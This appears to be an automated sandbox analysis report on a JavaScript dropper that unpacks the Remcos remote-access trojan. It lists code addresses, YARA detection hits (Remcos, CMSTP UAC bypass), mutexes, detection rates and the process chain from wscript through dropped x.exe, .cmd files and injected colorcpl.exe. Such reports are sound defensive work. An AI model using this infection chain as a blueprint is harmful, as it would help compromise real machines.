                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029730493_2_02973049
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029591E33_2_029591E3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0297969B3_2_0297969B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0294D60D3_2_0294D60D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029677303_2_02967730
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029637503_2_02963750
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0294D7473_2_0294D747
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029635213_2_02963521
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02957B113_2_02957B11
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0295D8F03_2_0295D8F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0294380B3_2_0294380B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029639AD3_2_029639AD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1E29B8_2_02E1E29B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E373DA8_2_02E373DA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E383808_2_02E38380
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E2809D8_2_02E2809D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3E1E08_2_02E3E1E0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E421C08_2_02E421C0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E281D78_2_02E281D7
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E5412B8_2_02E5412B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3774C8_2_02E3774C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E534728_2_02E53472
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E2747E8_2_02E2747E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3E43D8_2_02E3E43D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E325A18_2_02E325A1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E4DAD98_2_02E4DAD9
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1F8098_2_02E1F809
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E379F68_2_02E379F6
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E279F58_2_02E279F5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3DFB18_2_02E3DFB1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E37F788_2_02E37F78
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E35F528_2_02E35F52
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E13CA08_2_02E13CA0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E37CBD8_2_02E37CBD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E33C738_2_02E33C73
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E3DD828_2_02E3DD82
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_029620B415_2_029620B4
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303838016_2_03038380
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030373DA16_2_030373DA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301E29B16_2_0301E29B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0305412B16_2_0305412B
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030421C016_2_030421C0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030281D716_2_030281D7
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303E1E016_2_0303E1E0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0302809D16_2_0302809D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303774C16_2_0303774C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030325A116_2_030325A1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303E43D16_2_0303E43D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0305347216_2_03053472
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0302747E16_2_0302747E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0304DAD916_2_0304DAD9
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030379F616_2_030379F6
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030279F516_2_030279F5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301F80916_2_0301F809
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03035F5216_2_03035F52
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03037F7816_2_03037F78
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303DFB116_2_0303DFB1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0303DD8216_2_0303DD82
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03033C7316_2_03033C73
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03013CA016_2_03013CA0
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03037CBD16_2_03037CBD
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: String function: 02973E20 appears 48 times
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: String function: 02964414 appears 154 times
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: String function: 0296457C appears 570 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02903E9C appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02927687 appears 38 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 028F457C appears 835 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 028F421C appears 64 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02903E20 appears 54 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 028F4414 appears 246 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0295A750 appears 46 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E01F96 appears 49 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 030351E0 appears 55 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03001F96 appears 49 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E351E0 appears 55 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E34ACF appears 43 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E01EBF appears 31 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03002117 appears 39 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03034ACF appears 43 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03001EBF appears 31 times
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E02117 appears 45 times
                      Source: 6732832.jsInitial sample: Strings found which are bigger than 50
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@19/7@0/1
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E17AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_02E17AD9
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03017AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_03017AD9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F793C GetDiskFreeSpaceA,3_2_028F793C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_02E0C03C
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1B9AB FindResourceA,LoadResource,LockResource,SizeofResource,8_2_02E1B9AB
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1AE6B OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_02E1AE6B
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\All Users\6770.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
                      Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HRCZR2
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 6732832.jsVirustotal: Detection: 47%
                      Source: 6732832.jsReversingLabs: Detection: 41%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: unknownProcess created: C:\Users\user\Links\Ekbmajrx.PIF "C:\Users\user\Links\Ekbmajrx.PIF"
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: unknownProcess created: C:\Users\user\Links\Ekbmajrx.PIF "C:\Users\user\Links\Ekbmajrx.PIF"
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: C:\Users\user\Links\Ekbmajrx.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
